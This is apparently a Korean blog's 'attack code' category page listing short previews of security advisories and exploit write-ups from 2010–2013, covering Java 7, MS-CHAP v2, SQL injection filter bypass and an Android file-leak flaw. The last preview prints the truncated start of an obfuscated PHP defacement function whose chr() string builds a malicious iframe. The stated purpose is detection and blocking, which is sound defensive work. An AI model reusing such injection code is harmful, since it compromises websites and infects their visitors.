본문 바로가기

공격코드13

Oracle Java 7 신규 취약점 주의 □ 개요 o 오라클社의 Java 7에서 원격코드 실행이 가능한 취약점이 발견됨 [1] o Java가 설치된 시스템의 사용자는 특수하게 제작된 웹사이트 방문 시, 악성코드 감염 등의 피해를 입을 수 있음 o 해당 취약점을 악용한 공격 코드가 유포되고 있어, 사용자 주의가 특히 요구됨 □ 해당 시스템 o 영향 받는 소프트웨어 - Oracle Java 7 update 10 및 이전버전 □ 권장방안 o 현재 해당 취약점에 대한 보안업데이트는 발표되지 않았음 o 취약점으로 인한 위협을 경감시키기 위하여 보안업데이트 발표 전까지 Java를 설치한 사용자는 브라우저에서 Java가 실행되지 않도록 설정 [2] - Oracle Java 7 update 10 버전으로 업데이트 한 후 “Java 제어판”을 실행하여 보안 탭.. 2013. 1. 12.
Microsoft CHAP v2 프로토콜 취약점 주의 □ 개요 o 마이크로소프트(이하 MS)는 MS-CHAP v2 프로토콜의 암호화 취약점을 악용한 공격코드가 공개되었음을 확인함 [1] o 공격자는 해당 취약점을 악용한 MITM 공격 등을 통하여 사용자 자격증명을 획득할 수 있음 ※ MS-CHAP v2 프로토콜 : Microsoft Challenge Handshake Authentication Protocol version 2의 약어로 PPTP(Point-to-Point Tunneling Protocol) 기반 VPN에 일반적으로 사용되는 인증 방법□ 영향을 받는 환경 o PPTP 기반 VPN의 인증방법으로 MS-CHAP v2만을 사용하는 경우 해당 취약점에 영향을 받음□ 권장 해결방안 o MS는 PPTP 기반 VPN 인증으로 MS-CHAP v2 대신 PE.. 2012. 8. 21.
False SQL Injection and Advanced Blind SQL Injection ######################################################################### # # # Exploit Title: False SQL injection and advanced blind SQL injection # # Date: 21/12/2011 # # Author: wh1ant # # # ######################################################################### 이 문서는 SQL injection 공격이 웹 방화벽이나 기타 보안 솔루션 방어 우회가 가능하다는걸 공개하기 위해 작성하였다. 한국 웹 방화벽을 대상으로 테스트 한 결과 대부분의 SQL injection 필터링 우회가 가능하였다. 이.. 2011. 12. 30.
구글 안드로이드폰, 정보유출 취약점 공격 코드 주의! 구글 안드로이드 진저브레드 2.3.3 버전 이하의 모든 스마트폰에서 이용자의 정보를 유출시킬 수 있는 취약점에 대한 공격 코드가 공개돼 주의가 요구된다. 스마트 플랫폼 보안 전문 업체인 아이넷캅에서는 지난달 28일 해외 보안 포럼을 통해 공개된 ‘Google 안드로이드 스마트폰 콘텐츠 프로바이더 URI를 통한 파일 유출 취약점’을 분석하여 그 위험성을 확인했다. 해당 취약점은 이미 지난해인 2010년 11월 18일 최초로 발견된 취약점으로써 1년이 지난 시점에 실제 취약점을 공격하는 코드가 외부에 공개된 것이다. 공격자가 이번 취약점을 악용하여 SMS 스팸 문자나 모바일 메신저 링크, QR 코드 등을 통해 특수하게 조작된 웹 페이지를 사용자가 열어보도록 유도할 경우 정보를 유출하는 공격 스크립트가 실행되.. 2011. 12. 6.
Mass SQL Injection Attack Code (PHP, MySQL) * 홈페이지 변조 및 Mass SQL Injection을 통해 대량 악성코드 유포 발생 - 최근 공격 코드 유형 파악해서 차단이나 알람 대응 필요 # 홈페이지 변조 코드 function gmfun($path){$daima=chr(60).chr(105).chr(102).chr(114).chr(97).chr(109).chr(101).chr(32).chr(115).chr(114).chr(99). chr(61).chr(38).chr(35).chr(120).chr(54).chr(56).chr(59).chr(38).chr(35).chr(120).chr(55).chr(52).chr(59). chr(38).chr(35).chr(120).chr(55).chr(52).chr(59).chr(38).chr(35).chr(12.. 2010. 12. 28.

티스토리툴바